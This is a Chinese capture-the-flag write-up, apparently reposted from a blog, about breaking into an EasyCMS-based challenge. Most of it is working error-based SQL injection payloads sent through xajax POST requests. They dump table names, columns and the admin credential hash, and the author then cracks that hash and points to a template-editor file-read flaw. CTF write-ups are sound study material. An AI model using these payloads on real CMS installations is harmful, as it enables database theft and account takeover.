题目在i春秋ctf大本营
题目的提示并没有什么卵用,打开链接发现其实是easycms,百度可以查到许多通用漏洞
这里我利用的是无限报错注入
访问url/celive/live/header.php,直接进行报错注入
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>继续POST,拿表
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>这里出现了一个尴尬的问题,显示的长度不够了,通过调整1,32的1来调整,这里因为里面的表实在太多了(也不知道大佬们是怎么精准定位yesercms_user的表的),接着跑一下字段
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(column_name) from information_schema.columns where table_name='yesercms_user'),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>最后爆用户密码:
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%27%2C%28UpdateXML%281%2CCONCAT%280x5b%2Cmid%28%28SELECT%2f%2a%2a%2fGROUP_CONCAT%28concat%28username%2C%27%7C%27%2Cpassword%29%29%20from%20yesercms_user%29%2C1%2C32%29%2C0x5d%29%2C1%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%29--%20</q></xjxquery>这里md5的长度也不够,还是需要调整1,32来查看完整的md5
拿到账号密码admin|ff512d4240cbbdeafada404677ccbe61,解密后得到明文:Yeser231
登录admin账号来到后台管理界面,疯狂的寻找上传点,发现好像并没卵用,试着在文件中写一句话好像也并不能成功,看了wp,才知道在当前模板编辑处存在文件读取漏洞
转载于:https://www.cnblogs.com/Ragd0ll/p/8832435.html
